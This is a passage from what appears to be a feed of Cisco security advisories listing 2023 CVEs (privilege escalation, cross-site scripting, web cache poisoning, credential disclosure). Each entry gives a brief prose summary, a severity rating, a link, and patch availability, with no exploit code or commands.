This vulnerability is due to insufficient input validation of user-supplied CLI arguments. An attacker could exploit this vulnerability by authenticating to an affected device and using crafted commands at the prompt. A successful exploit could allow the attacker to execute arbitrary commands as root. The attacker must have valid credentials on the affected device.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-thoueye-privesc-NVhHGwb3



     
         
Security Impact Rating:  High
   
   
       
CVE: CVE-2023-20224
Source: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation Vulnerability
#16
Cisco Integrated Management Controller Cross-Site Scripting Vulnerability

A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.


This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the browser of the targeted user or access sensitive, browser-based information.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cimc-xss-UMYtYEtr

Security Impact Rating: Medium
CVE: CVE-2023-20228
Source: Cisco Integrated Management Controller Cross-Site Scripting Vulnerability
#17
Cisco Unified Contact Center Express Finesse Portal Web Cache Poisoning Vulnerability

A vulnerability in the Tomcat implementation for Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenticated, remote attacker to cause a web cache poisoning attack on an affected device.


This vulnerability is due to improper input validation of HTTP requests. An attacker could exploit this vulnerability by sending crafted HTTP requests to a specific API endpoint on the Unified CCX Finesse Portal. A successful exploit could allow the attacker to cause the internal WebProxy to redirect users to an attacker-controlled host.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uccx-wcp-JJeqDT3S

Security Impact Rating: Medium
CVE: CVE-2023-20232
Source: Cisco Unified Contact Center Express Finesse Portal Web Cache Poisoning Vulnerability
#18
Cisco Prime Infrastructure and Evolved Programmable Network Manager Stored Cross-Site Scripting Vulnerability

A vulnerability in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface on an affected device.


The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-pi-epnm-storedxss-tTjO62r

Security Impact Rating: Medium
CVE: CVE-2023-20222
Source: Cisco Prime Infrastructure and Evolved Programmable Network Manager Stored Cross-Site Scripting Vulnerability
#19
Cisco Prime Infrastructure and Evolved Programmable Network Manager Cross-Site Scripting Vulnerabilities

Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface on an affected device.


These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by persuading a user of an affected interface to view a page containing malicious HTML or script content. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have valid credentials to access the web-based management interface of the affected device.


Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-pi-epnm-BFjSRJP5

Security Impact Rating: Medium
CVE: CVE-2023-20201, CVE-2023-20203, CVE-2023-20205
Source: Cisco Prime Infrastructure and Evolved Programmable Network Manager Cross-Site Scripting Vulnerabilities
#20
Cisco Identity Services Engine Device Credential Information Disclosure Vulnerability

A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to access sensitive information.


This vulnerability is due to the improper storage of sensitive information within the web-based management interface. An attacker could exploit this vulnerability by logging in to the web-based management interface and viewing hidden fields within the application. A successful exploit could allow the attacker to access sensitive information, including device entry credentials, that could aid the attacker in further attacks.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-credentials-tkTO3h3

Security Impact Rating: Medium
CVE: CVE-2023-20111
Source: Cisco Identity Services Engine Device Credential Information Disclosure Vulnerability